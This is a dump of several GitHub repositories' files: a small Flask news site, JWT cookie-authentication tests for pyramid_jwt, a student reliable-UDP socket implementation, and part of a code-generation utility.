"text": "from sqlalchemy import create_engine\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, News, Tender, Headlines\n\n# bind our database to a engine that we can perform operation.\nengine = create_engine('sqlite:///semari.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\n\nfrom flask import Flask, render_template, redirect, request, url_for, flash\n\napp = Flask(__name__)\n\n\[email protected](\"/\")\ndef index():\n session = DBSession()\n newsCursor = session.query(News).order_by(News.id.desc()).limit(6).all()\n tenderCursor = session.query(Tender).order_by(Tender.id.desc()).limit(4).all()\n headlinesCursor = session.query(Headlines).order_by(Headlines.id.desc()).limit(4).all()\n session.close()\n return render_template('index.html', news=newsCursor, tender=tenderCursor, headlines=headlinesCursor)\n\n\[email protected](\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\[email protected](\"/schemes\")\ndef scheme():\n return render_template(\"schemes.html\")\n\n\[email protected](\"/rules\")\ndef rules():\n return render_template(\"rules.html\")\n\n\[email protected](\"/admin\")\ndef admin():\n return render_template(\"admin.html\")\n\n\[email protected](\"/news\")\ndef news():\n return render_template(\"post.html\", data=\"news\")\n\n\[email protected](\"/tender\")\ndef tender():\n return render_template(\"post.html\", data=\"tender\")\n\n\[email protected](\"/headlines\")\ndef headlines():\n return render_template(\"post.html\", data=\"headlines\")\n\n\[email protected](\"/dbentry\", methods=[\"GET\", \"POST\"])\ndef dbentry():\n if (request.method == \"POST\"):\n if request.form['datatype'] == 'news':\n session = DBSession()\n newsObj = News(link=request.form['link'], post=request.form['post'])\n session.add(newsObj)\n session.commit()\n session.close()\n return redirect(url_for(\"index\"))\n if request.form['datatype'] == 'tender':\n session = DBSession()\n tenderObj = Tender(link=request.form['link'], post=request.form['post'])\n session.add(tenderObj)\n session.commit()\n session.close()\n return redirect(url_for(\"index\"))\n if request.form['datatype'] == 'headlines':\n session = DBSession()\n headObj = Headlines(link=request.form['link'], post=request.form['post'])\n session.add(headObj)\n session.commit()\n session.close()\n return redirect(url_for(\"index\"))\n else:\n return render_template(\"dbentry\")\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n"
},
{
"alpha_fraction": 0.6950052976608276,
"alphanum_fraction": 0.7141339182853699,
"avg_line_length": 24.432432174682617,
"blob_id": "f6a08d8c5f6479d5dc9c49a4882f36af14f0dfb9",
"content_id": "b4240b6dc5a8b112b40bf4f46841b0071895e88c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 941,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 37,
"path": "/database_setup.py",
"repo_name": "vkbinfo/vishalsemari",
"src_encoding": "UTF-8",
"text": "# sqlalchemy configuration start same for every app\n\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\n\nBase = declarative_base()\n\n\n# configuration complete the above code is bascially required for every sqlalchemy app\n\nclass News(Base):\n __tablename__ = \"news\"\n id = Column(Integer, primary_key=True)\n link = Column(String(500))\n post = Column(String(100), nullable=False)\n\n\nclass Tender(Base):\n __tablename__ = \"tender\"\n id = Column(Integer, primary_key=True)\n link = Column(String(500))\n post = Column(String(100), nullable=False)\n\n\nclass Headlines(Base):\n __tablename__ = \"headlines\"\n id = Column(Integer, primary_key=True)\n link = Column(String(500))\n post = Column(String(100), nullable=False)\n\n\n# initialize database and table\n\nengine = create_engine('sqlite:///semari.db')\n\nBase.metadata.create_all(engine)\n"
},
{
"alpha_fraction": 0.5636363625526428,
"alphanum_fraction": 0.7090908885002136,
"avg_line_length": 17.33333396911621,
"blob_id": "4cd18b21a9a3f3d2983e8f8d1723e09a99b6d266",
"content_id": "c5ddf8b0a4193f2e8137aaeb26c20a1a817695cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "vkbinfo/vishalsemari",
"src_encoding": "UTF-8",
"text": "Flask==0.12.2\nSQLAlchemy==1.2.0b1\nsqlite-devel==\"what\"\n"
}
],
"num_files": 3

"repo_name": "tripsolutions/pyramid_jwt",
"repo_url": "https://github.com/tripsolutions/pyramid_jwt",
"snapshot_id": "ff9ae8cb2e61f6fde498842ecc0d7be43a58a3d1",
"revision_id": "320ed080216971467ae5e12b1f9888b50a9a29b7",
"directory_id": "cf4796b4dd90b71df2274f2f7e55c94a2ba24a5a",
"branch_name": "refs/heads/master",
"visit_date": "2023-03-21T12:49:17.694838",
"revision_date": "2021-03-11T09:25:19",
"committer_date": "2021-03-11T09:25:19",
"github_id": 343829429,
"star_events_count": 0,
"fork_events_count": 0,
"gha_license_id": null,
"gha_created_at": null,
"gha_updated_at": null,
"gha_pushed_at": null,
"gha_language": null,
"files":
[
{
"alpha_fraction": 0.6791045069694519,
"alphanum_fraction": 0.6857060790061951,
"avg_line_length": 28.277311325073242,
"blob_id": "6f6a408302068403a6993d3d7e48586392fa382d",
"content_id": "f7199764cac1f3e56cc1b5f43ff6f14fb40c8601",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3484,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 119,
"path": "/tests/test_cookies.py",
"repo_name": "tripsolutions/pyramid_jwt",
"src_encoding": "UTF-8",
"text": "import uuid\n\nimport pytest\n\nfrom pyramid.interfaces import IAuthenticationPolicy\nfrom webob import Request\nfrom zope.interface.verify import verifyObject\n\nfrom pyramid_jwt.policy import JWTCookieAuthenticationPolicy\n\n\[email protected](scope=\"module\")\ndef principal():\n return str(uuid.uuid4())\n\n\ndef test_interface():\n verifyObject(IAuthenticationPolicy, JWTCookieAuthenticationPolicy(\"secret\"))\n\n\ndef test_cookie(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\")\n token = policy.create_token(principal)\n cookie = policy.remember(dummy_request, token).pop()\n\n assert len(cookie) == 2\n\n header, cookie = cookie\n assert header == \"Set-Cookie\"\n assert len(cookie) > 0\n\n\ndef test_cookie_name(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", cookie_name=\"auth\")\n token = policy.create_token(principal)\n _, cookie = policy.remember(dummy_request, token).pop()\n\n name, value = cookie.split(\"=\", 1)\n assert name == \"auth\"\n\n\ndef test_secure_cookie():\n policy = JWTCookieAuthenticationPolicy(\"secret\", https_only=True)\n dummy_request = Request.blank(\"/\")\n token = policy.create_token(str(uuid.uuid4()))\n _, cookie = policy.remember(dummy_request, token).pop()\n\n assert \"; secure;\" in cookie\n assert \"; HttpOnly\" in cookie\n\n\ndef test_insecure_cookie(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", https_only=False)\n token = policy.create_token(principal)\n _, cookie = policy.remember(dummy_request, token).pop()\n\n assert \"; secure;\" not in cookie\n assert \"; HttpOnly\" in cookie\n\n\ndef test_cookie_decode(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", https_only=False)\n\n token = policy.create_token(principal)\n header, cookie = policy.remember(dummy_request, token).pop()\n name, value = cookie.split(\"=\", 1)\n\n value, _ = value.split(\";\", 1)\n dummy_request.cookies = {name: value}\n\n claims = policy.get_claims(dummy_request)\n assert claims[\"sub\"] == principal\n\n\ndef test_invalid_cookie_reissue(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", https_only=False, reissue_time=10)\n\n token = \"invalid value\"\n header, cookie = policy.remember(dummy_request, token).pop()\n name, value = cookie.split(\"=\", 1)\n\n value, _ = value.split(\";\", 1)\n dummy_request.cookies = {name: value}\n\n claims = policy.get_claims(dummy_request)\n assert not claims\n\n\ndef test_cookie_max_age(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", cookie_name=\"auth\", expiration=100)\n _, cookie = policy.remember(dummy_request, principal).pop()\n _, value = cookie.split(\"=\", 1)\n\n _, meta = value.split(\";\", 1)\n assert \"Max-Age=100\" in meta\n assert \"expires\" in meta\n\n\[email protected]_time\ndef test_expired_token(principal, freezer):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", cookie_name=\"auth\", expiration=1)\n token = policy.create_token(principal)\n _, cookie = policy.remember(dummy_request, token).pop()\n name, value = cookie.split(\"=\", 1)\n\n freezer.tick(delta=2)\n\n value, _ = value.split(\";\", 1)\n dummy_request.cookies = {name: value}\n claims = policy.get_claims(dummy_request)\n\n assert claims == {}\n"
}
] | 1 |
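The pyramid_jwt tests above drive the cookie policy through three calls: create_token mints a JWT for a principal, remember turns it into a ("Set-Cookie", value) pair, and get_claims reads the claims back off a request carrying that cookie. A minimal round-trip sketch using only the API the tests themselves exercise; the secret and principal here are illustrative values, not library defaults:

from webob import Request
from pyramid_jwt.policy import JWTCookieAuthenticationPolicy

policy = JWTCookieAuthenticationPolicy("secret", https_only=False)
request = Request.blank("/")

token = policy.create_token("user-42")             # mint a JWT
_, cookie = policy.remember(request, token).pop()  # ("Set-Cookie", "<name>=<jwt>; ...")

# Echo the cookie back the way test_cookie_decode does.
name, value = cookie.split("=", 1)
request.cookies = {name: value.split(";", 1)[0]}

assert policy.get_claims(request)["sub"] == "user-42"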
katiemartins/smart_and_health_buildings | https://github.com/katiemartins/smart_and_health_buildings | 0efa2a04bc9c9a3c8d5beda173c7d9bb68be9735 | 229beb305dc2d009bc5a16733eda8ab41f02165e | b0b453967c64f00591de1115bcf2af4814cf078e | refs/heads/main | 2023-08-14T12:42:52.144688 | 2021-09-16T14:34:14 | 2021-09-16T14:34:14 | 406,953,615 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.5652173757553101,
"avg_line_length": 8.199999809265137,
"blob_id": "46feab5cc647b39dd7ed4200605d3aa11958d4e4",
"content_id": "127c137bd5e5466980aae744c78445022961d267",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 5,
"path": "/README.md",
"repo_name": "katiemartins/smart_and_health_buildings",
"src_encoding": "UTF-8",
"text": "### Katie Martins\n\n- Count\n- Paper\n- \"Regular\" Human\n"
},
{
"alpha_fraction": 0.5095541477203369,
"alphanum_fraction": 0.5286624431610107,
"avg_line_length": 17.875,
"blob_id": "1ec46f1a07966fa66850be55521992aa4f300f8b",
"content_id": "43315fefe9002921cadc465817927f1ba132181a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 8,
"path": "/good_bye.py",
"repo_name": "katiemartins/smart_and_health_buildings",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\ndef main():\r\n for i in range (random.randint(1, 25)):\r\n print(\"good bye cruel world \\n\")\r\n\r\nif __name__ == \"__main__\":\r\n main()"
}
] | 2 |
khanquer/CS352ProjectPart2 | https://github.com/khanquer/CS352ProjectPart2 | e1232ce6f2c6121dd5bc7fb0bcf41b1c3aff2504 | 0079f37c37bac3a82fe94c4401e84b05c56370e3 | 6fbc095c2d6297d9bca24a765b03849ade677433 | refs/heads/master | 2020-09-29T11:25:39.428183 | 2019-12-11T04:16:14 | 2019-12-11T04:16:14 | 227,029,420 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5471698045730591,
"alphanum_fraction": 0.5641509294509888,
"avg_line_length": 24.238094329833984,
"blob_id": "ad8ec5e64031150bea69b73a979d62a9f2ee48df",
"content_id": "915c20b5368f117eebf4c33ec61dbf4e57f01430",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 21,
"path": "/util.py",
"repo_name": "khanquer/CS352ProjectPart2",
"src_encoding": "UTF-8",
"text": "class dbuffer:\n def __init__(self):\n self.MAXSIZE = 2620000\n self.buff = bytes()\n self.len = 0\n self.isFull = False\n self.initialized = False\n \n def initialize(self):\n self.initialized = True\n\n def addStuff(self, stuff, length):\n self.buff = self.buff + stuff\n self.len = self.len + length\n return\n\n def remStuff(self,nbytes):\n return self.buff[0:nbytes]\n\n def __str__(self):\n return 'PRINT FROM THE dbuffer CLASS : ' + str(self.buff)\n"
},
{
"alpha_fraction": 0.528799295425415,
"alphanum_fraction": 0.54402095079422,
"avg_line_length": 31.847999572753906,
"blob_id": "b775959a7f7277f706e3bd07299d1b5978cd15d3",
"content_id": "1debbbc57d9ebfd97cccbddb4400075adaea5505",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16424,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 500,
"path": "/sock352.py",
"repo_name": "khanquer/CS352ProjectPart2",
"src_encoding": "UTF-8",
"text": "import binascii\nimport socket as syssock\nimport struct\nimport sys, os\n\nimport random\nimport threading\nimport time\n\nfrom util import dbuffer\n\n# these functions are global to the class and\n# define the UDP ports all messages are sent\n# and received from\n\nmainSock = (0, 0)\nportTx = 0\nportRx = 0\ncAddress = None\n\n\nfileLen = -1\nmaxBytes = 32000\nmaxSend = 0\ngstartI = 0\ngseqNo = 0x00\n\ndone = False\nstartChanged = False\n\ntimeoutDuration = 0.2\n\nflag = 0x00\nheaderLen = 0x17\nfirstseqNo = 0x00\nfinalseqNo = 0x00\n\nseqNo = 0x00\nackNo = 0x00\n\npayloadLen = 0x00\n\nshowPrint = True\ndropPackets = False\n\nbfile = bytes()\nalldata = bytes()\n\nbytesreceived = 0\nrecBytes = 0\n\nflagsDict = {0x01:'SYN', 0x02:'FIN', 0x03:'DATA', 0x04:'ACK',\\\n 0x08:'SOCK352_RESET', 0xA0:'SOCK352_HAS_OPT'}\n\n\n\ndef init(UDPportTx,UDPportRx): # initialize your UDP socket here \n print(UDPportTx)\n print(UDPportRx)\n global mainSock, portTx, portRx\n\n portTx = int(UDPportTx)\n portRx = int(UDPportRx)\n \n cAddress = portRx\n\n mainSock = syssock.socket(syssock.AF_INET, syssock.SOCK_DGRAM)\n mainSock.bind(('',portTx))\n print(type(mainSock))\n pass\n \nclass socket:\n def __init__(self): # fill in your code here\n print('Initializing')\n if (showPrint == False):\n self.disablePrint()\n else:\n self.enablePrint()\n self.t2 = threading.Thread(target = self.recvThread,args = ())\n\n self.buff = dbuffer()\n \n return\n def bind(self,address):\n print('Binding')\n #print(address)\n return \n\n #Connect implements the client end of the three-way handshake\n #First sends a Syn pack to server\n #Receives a Syn ack pack from server\n #Then sends Ack packet to server\n #This informs the socket what ACK to expect from the server by setting local Ack and Seq No\n \n def connect(self,address): # fill in your code here \n global mainSock, cAddress\n global flag, headerLen, seqNo, ackNo, payloadLen\n \n print('CLIENT SOCK INFO = {}'.format(mainSock.getsockname))\n \n seqNo = random.randint(1,1000)\n \n #aflag, seqNo, ackNo, payloadLen\n \n synpackheader = self.getPacketHeader(0x01,seqNo,0x00,0x00)\n print(synpackheader)\n mainSock.sendto(synpackheader,('',portRx))\n print('SENT SYNPACK TO SERVER ')\n rec = mainSock.recv(maxBytes)\n print('RECEIVED SYNACK PACK FROM SERVER ')\n [flags,headerLen,s,a,payloadLen] = self.openPacketHeader(rec)\n ackNo = s\n ackheader = self.getPacketHeader(0x04,0x00,s+1,0x00)\n mainSock.sendto(ackheader,('',portRx))\n print('SENT ACK PACK TO SERVER')\n print( ' CLIENT SEQNO = {} | ACKNO = {} '.format(seqNo,ackNo))\n \n return \n\n #does nothing for now\n def listen(self,backlog):\n return\n\n #Accept executes the server end's three way handshake\n # First receives the syn packet from client, checks the flag to be SYN, records the sequence number and sets the ack as this\n # Send the SYN ACK packet back using a random number for the Syn\n # Receive ACK packet from the client\n # Uses openPacketHeader and getPacketHeader to generate and parse packets \n def accept(self):\n \n global mainSock \n global flag,headerLen,seqNo,ackNo,payloadLen\n print('SERVER SOCK INFO = {}'.format(mainSock.getsockname()))\n \n print(flag,headerLen,seqNo,ackNo,payloadLen)\n \n while ((flag == 0x00) and (flagsDict.get(flag)!= 'SYN')):\n rec = mainSock.recv(maxBytes)\n [flag,headerLen,s,a,payload_len] = self.openPacketHeader(rec)\n print()\n \n print('RECEIVED SYN PACK FROM CLIENT ')\n \n seqNo = random.randint(1,1000)\n ackNo = s+1\n packet = self.getPacketHeader(0x01, seqNo, ackNo, 
payloadLen)\n \n mainSock.sendto(packet,('',portRx))\n print('SENT SYNPACK TO CLIENT ')\n \n rec = mainSock.recv(maxBytes)\n print('RECEIVED ACK FROM CLIENT ')\n \n print( ' SERVER SEQNO = {} | ACKNO = {} '.format(seqNo,ackNo))\n return(self,portRx)\n \n def close(self): # fill in your code here\n global headerLen\n print('CLOSE CALLED')\n pktReceived = False\n mainSock.settimeout(0.5)\n finpkt = self.getPacketHeader(0x02,seqNo+1,ackNo,0x00)\n \n while (not pktReceived):\n try:\n receivedpkt = mainSock.recv(headerLen)\n pktReceived = True\n except syssock.timeout:\n mainSock.sendto(finpkt,('',portRx))\n print('SENT A FIN PACKET')\n pktReceived = False\n print(receivedpkt)\n receivedOpen = self.openPacketHeader(receivedpkt)\n rflag = receivedOpen[0]\n seq = receivedOpen[1]\n #print(receivedOpen[0],receivedOpen[2])\n ackpkt = self.getPacketHeader(0x04,seqNo+1,seq+1,0x00)\n finpkt2 = self.getPacketHeader(0x02,seqNo+1,0,0x00)\n\n mainSock.settimeout(3)\n print(rflag)\n print(flagsDict.get(rflag))\n #if(flagsDict.get(rflag) == 'FIN'):#You are the fin receiver\n if(rflag != 4):\n print('I AM THE FIN RECEIVER\\n')\n mainSock.sendto(ackpkt,('',portRx))\n mainSock.sendto(finpkt2,('',portRx))\n mainSock.recv(headerLen)\n else: #FIN INITIATOR\n print('I AM THE FIN INITIATOR\\n')\n mainSock.recv(headerLen)\n mainSock.sendto(ackpkt,('',portRx))\n \n print('CONNECTION CLOSED USING DOUBLE HANDSHAKE')\n return \n\n '''\n send does a few things\n 1. send the file length to the server\n 2. sends the file contents to the server\n 3. starts threads 1 and 3\n * thread 1: controls the sending of the contents to the server\n * thread 3: controls reciving of acknowledgements from server\n '''\n\n def send(self,buffer):\n print('SEND EXECUTED \\n\\t SOCK INFO : {}'.format(mainSock.getsockname()))\n \n global fileLen, maxBytes, bfile, firstseqNo,finalseqNo, maxSend\n global flag, headerLen, seqNo, ackNo, payloadLen\n \n if(fileLen == -1):\n longPacker = struct.Struct(\"!L\")\n fileLen = longPacker.unpack(buffer)\n fileLen = fileLen[0]\n print(fileLen)\n mainSock.sendto(buffer,('',portRx))\n return\n \n maxSend = maxBytes - headerLen\n seqNo = seqNo + 1\n firstseqNo = seqNo\n finalseqNo = int(fileLen/maxSend)+firstseqNo\n if (fileLen%maxSend > 0):\n finalseqNo += 1\n print('firstseqNo = {} | finalseqNo = {}\\n'.format(firstseqNo,finalseqNo))\n bytessent = 0 \n print('BUFFER LEN = {}'.format(len(buffer)))\n bfile = buffer[0:len(buffer)]\n t1 = threading.Thread(target = self.sendThread)\n t3 = threading.Thread(target = self.recvAckThread)\n #t2 = threading.Thread(target = recvAckThread, args())\n \n \n print('THREAD 1 STARTED')\n t1.start()\n print('THREAD 3 STARTED')\n t3.start()\n t1.join()\n t3.join() \n \n self.enablePrint()\n return fileLen\n\n def recv(self,nbytes):\n print('RECV EXECUTED \\n\\t SOCK INFO : {}'.format(mainSock.getsockname()))\n global fileLen, maxBytes, recBytes\n global flag, headerLen, seqNo, ackNo, payloadLen\n \t\n if(fileLen == -1):\n fileLenPacked = mainSock.recv(10)\n longPacker = struct.Struct(\"!L\")\n fileLen = longPacker.unpack(fileLenPacked)\n print('FILE LENGTH = {}'.format(fileLen[0]))\n fileLen = fileLen[0]\n return fileLenPacked\n \t\n print('fileLen = {}'.format(fileLen))\n b = self.buff\n t2 = self.t2\n if (b.initialized == False):\n b.initialized = True\n t2.start()\n \n chunk = self.detractBuff(nbytes)\n \n recBytes = recBytes + nbytes\n \n \n if(recBytes >= fileLen):\n t2.join()\n \n print('recv called | nbytes = {} | chunk = {} \\n'.format(nbytes,chunk))\n \t\n return 
chunk\n \n def detractBuff(self,nbytes):\n print(self.buff)\n size = 0\n while (size == 0):\n size = self.buff.len\n continue\n \n stuff = self.buff.remStuff(nbytes)\n return stuff\n \n #SEND PACKETS\n #CLIENT THREAD 1\n def sendThread(self):\n print('SEND THREAD EXECUTED')\n \n #aflag, seqNo, ackNo, payloadLen\n global fileLen, maxBytes, bfile, done, gstartI, gseqN, startChanged,maxSend\n global flag, headerLen, seqNo, ackNo, payloadLen\n maxSend = maxBytes-headerLen\n payloadLen = maxSend\n bytessent = 0\n startI = 0\n endI = startI + payloadLen\n seqNo = seqNo + 1\n while(done == False):\n if (startI < fileLen):\n if (startChanged == True):\n startI = gstartI\n seqNo = gseqNo\n \n endI = startI + maxSend\n \n startChanged = False\n\n if (endI > fileLen):\n endI = fileLen\n \n payloadLen = endI - startI\n #else:\n # endI = startI + payloadLen\n \t \n b = bfile[startI:endI]\n \n head = self.getPacketHeader(0x03,seqNo,0x00,payloadLen)\n sendProb = random.randint(1,10)\n #mainSock.sendto(head+b,('',portRx))\n if(dropPackets == False):\n sendProb = 10\n\n if (sendProb > 3):\n mainSock.sendto(head+b,('',portRx))\n print('SENT THIS PACKET : ')\n else:\n print('DROPPED THIS PACKET : ')\n \n print('(seqNo = {} | ackNo = {}) \\n'.format(seqNo,0))\n #self.openPacketHeader(head)\n print('\\nINDICES | startI = {} | endI = {}\\n'.format(startI,endI))\n \n seqNo = seqNo + 1\n startI = startI + maxSend\n \n bytessent = bytessent + payloadLen\n # fill in your code here \n else:\n #time.sleep(.3)\n #print('\\n',startI,startChanged,gstartI)\n #startChanged, gstartI\n if(startChanged == True):\n #print('\\n',startI,startChanged,gstartI)\n startI = gstartI\n print('\\n',startI,startChanged,gstartI,gseqNo)\n return\n \n #LISTEN FOR ACKS FROM SERVER AND \n #CLIENT THREAD 2\n #THREAD 3\n def recvAckThread(self):\n global seqNo, firstseqNo, finalseqNo, timeoutDuration, done # gstartI\n global startChanged, gstartI, gseqNo\n currentackNo = firstseqNo\n startTime = 0\n endTime = 0\n startTime = time.clock()\n mainSock.settimeout(.001)\n hplusb = bytes()\n timeout = False\n \n headerLen = 0\n while(not done):\n print('\\trecvacklistening')\n \n try:\n hplusb = mainSock.recv(maxBytes)\n timeout = False\n except syssock.timeout:\n print('\\tSOCKET TIMEOUT BUT CONTINUE')\n timeout = True\n \n if (timeout == False):\n (head,data) = self.stripPacket(hplusb)\n print('\\n\\tPACKET ACK THAT WAS RECEIVED')\n [flags,headerLen,recseqNo,recackNo,payload_len] = self.openPacketHeader(head)\n print('\\t (recackNo = {} | currackNo = {}) \\n'.format(recackNo,currentackNo))\n if (recackNo > currentackNo):\n startTime = time.clock()\n currentackNo = recackNo\n \n endTime = time.clock()\n \n print('\\tstartTime = {} | endTime = {}'.format(startTime,endTime))\n dt = endTime - startTime\n print('\\tdt = {}'.format(dt))\n if (dt > timeoutDuration): #NEED TO TIME OUT AND RESET SENDER\n print('\\tTIME OUT SEND THE PACKET')\n \n gstartI = (currentackNo - firstseqNo)*(maxBytes-headerLen)\n \n startChanged = True\n gseqNo = currentackNo\n print('\\t firstseqNo = {} | seqNo = {} | gstartI = {} | startChanged = {}'.format(firstseqNo,seqNo,gstartI,startChanged))\n \n numpackets = (currentackNo - firstseqNo)\n print('\\t NUMBER OF PACKETS SENT (#ACK RECEIVED) = {}'.format(numpackets))\n maxSend = maxBytes-headerLen \n print('\\t\\t {}'.format(numpackets*maxSend))\n if (currentackNo >= finalseqNo):\n done = True\n print(finalseqNo)\n pass\n \n #LISTEN FOR SEQ AND SEND BACK ACK \n #SERVER THREAD 1\n #THEAD 2\n def recvThread(self):\n global 
fileLen, maxBytes, bytesreceived, done, alldata\n global flag, headerLen, seqNo, ackNo, payloadLen\n \n #alldata = bytes()\n bytesreceived = 0\n \t \n while (not done):\n print('LISTENING TO INPUTS | bytesreceived = {} | fileLen = {}'.format(bytesreceived,fileLen))\n \n hplusb = mainSock.recv(maxBytes)\n (head,data) = self.stripPacket(hplusb)\n print('\\nPACKET THAT WAS RECEIVED')\n [flags,headerLen,recseqNo,recackNo,payload_len] = self.openPacketHeader(head)\n \n if (recseqNo != ackNo): # WRONG PACKET RECEIVED (packet loss)\n head = self.getPacketHeader(0x04,0x00,ackNo,payloadLen)\n mainSock.sendto(head,('',portRx))\n print('SENT THIS ACK : seqNo = {} | ackNo = {} \\n'.format(0,ackNo))\n \n else:\n print(' RECEIVED CORRECT PACKET')\n ackNo = ackNo + 1\n head = self.getPacketHeader(0x04,0x00,ackNo,payloadLen)\n mainSock.sendto(head,('',portRx))\n print('SENT THIS ACK : seqNo = {} | ackNo = {} \\n '.format(0,ackNo))\n bytesreceived += payload_len\n alldata = alldata + data\n # CHECK IF BUFFER IS FULL BEFORE FILLING \n b = self.buff\n b.addStuff(data,payload_len)\n print(' BYTES RECEIVED = {} '.format(bytesreceived))\n \n if (bytesreceived >= fileLen):\n done = True\n pass\n \n \t\n #aflag, seqNo, ackNo, payloadLen\n def getPacketHeader(self, aflag, seqNo, ackNo, payloadLen):\n \n flags = aflag\n #headerLen= 0x17\n sequence_no = seqNo\n ack_no = ackNo\n payload_len = payloadLen\n \n version = 0x01\n opt_ptr = 0x00\n protocol = 0x00\n checksum = 0x00\n source_port = 0x00\n dest_port = 0x00\n window = 0x00\n \n headerLen = struct.calcsize('!BHQQLBBBHLLL')\n head = struct.pack('!BHQQLBBBHLLL',flags,headerLen,seqNo,ackNo,payloadLen, version,opt_ptr,protocol, checksum,source_port,dest_port,window)\n \n return head\n \n def openPacketHeader(self, packet):\n l = struct.unpack('!BHQQLBBBHLLL',packet)\n [flags,headerLen,seqNo,ackNo,payload_len,version,opt_ptr,protocol,checksum,source_port,dest_port,window] = l\n sl = l[0:5]\n #print(l)\n return sl\n \n '''\n def openPacketHeader2(self, packet):\n l = struct.unpack('!BQBB',packet)\n #0x02,seqNo+1,0x00,0x00\n [flags,seqNo,opt_ptr,protocol] = l\n return [flags, seqNo]\n '''\n def stripPacket(self, b):\n \n global headerLen\n d = headerLen\n head = b[0:d]\n data = b[d:]\n headopen = self.openPacketHeader(head)\n #print(' HEAD = {}'.format(headopen))\n #print(' DATA = {}'.format(data))\n return((head,data))\n\n def enablePrint(self):\n sys.stdout = sys.__stdout__\n\n def disablePrint(self):\n sys.stdout = open(os.devnull,'w')\n"
}
] | 2 |
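sock352.py above packs every packet header with the struct format '!BHQQLBBBHLLL': flags, header length, sequence number, ack number and payload length, followed by version, option pointer, protocol, checksum, source port, destination port and window, all in network byte order. A self-contained round-trip sketch of that layout, assuming only the format string the module itself uses; note that struct.calcsize reports 40 bytes for this format, not the 0x17 (23) that the module assigns to headerLen as an initial default:

import struct

HEADER_FMT = '!BHQQLBBBHLLL'               # same layout as getPacketHeader
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 40 bytes in network byte order

# A SYN packet with seq=123 and the trailing fields zeroed, as in getPacketHeader.
header = struct.pack(HEADER_FMT, 0x01, HEADER_LEN, 123, 0, 0,
                     0x01, 0x00, 0x00, 0x00, 0, 0, 0)
flags, hlen, seq, ack, payload_len = struct.unpack(HEADER_FMT, header)[0:5]
assert (flags, hlen, seq, ack, payload_len) == (0x01, 40, 123, 0, 0)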
temizkanekin/arakat | https://github.com/temizkanekin/arakat | cef9fdc8cd7a16df1d77694355db5fc97886fa45 | 0087fc4a010dbc4bcb825626cdb350482ef83664 | b93a31346ae8cabf52c9216579b5614500eb87c3 | refs/heads/master | 2020-03-28T12:01:04.636200 | 2019-01-17T10:54:35 | 2019-01-17T10:54:35 | 148,264,212 | 0 | 0 | Apache-2.0 | 2018-09-11T05:18:08 | 2018-09-07T13:38:57 | 2018-09-07T13:41:38 | null |
[
{
"alpha_fraction": 0.5732966065406799,
"alphanum_fraction": 0.5739848613739014,
"avg_line_length": 40.5428581237793,
"blob_id": "a1fd26321d4c5a7628285ab2a3fbf7fca2ba747a",
"content_id": "d291360cacd2aa0717dbcc2cd119eb7b09e7b990",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1453,
"license_type": "permissive",
"max_line_length": 233,
"num_lines": 35,
"path": "/arakat-backend/utils/CodeGenerationUtils.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "import os\n\ndef arrange_parameter_value(parameter_value):\n # For now, we will not allow dict and set; but handle them in case...\n if(isinstance(parameter_value, str)):\n value=__add_quotes_around_val(parameter_value)\n elif(isinstance(parameter_value, list)):\n value=[\"[\"]\n for val in parameter_value:\n value.extend([arrange_parameter_value(val), \", \"])\n value.pop()\n value.append(\"]\")\n value=''.join(value)\n else:\n value=str(parameter_value)\n\n return value\n\ndef __add_quotes_around_val(val):\n return '\"'+str(val)+'\"'\n\ndef arrange_schema(schema_info):\n # schema_info: [{\"column_name\":\"name\", \"data_type\": \"StringType\", \"is_nullable\": True}, {\"column_name\":\"name\", \"data_type\": \"ArrayType\", \"is_nullable\": True, \"array_extra\":{\"data_type\": \"IntegerType\", \"is_nullable\": False}}, ...]\n code=[\"StructType([\"]\n for elem in schema_info:\n if(elem[\"data_type\"] == \"ArrayType\"):\n code.extend(['StructField(\"'+ elem[\"column_name\"] +'\", ArrayType(' + elem[\"array_extra\"][\"data_type\"] +'(), ' + str(elem[\"array_extra\"][\"is_nullable\"]) + '), ' + 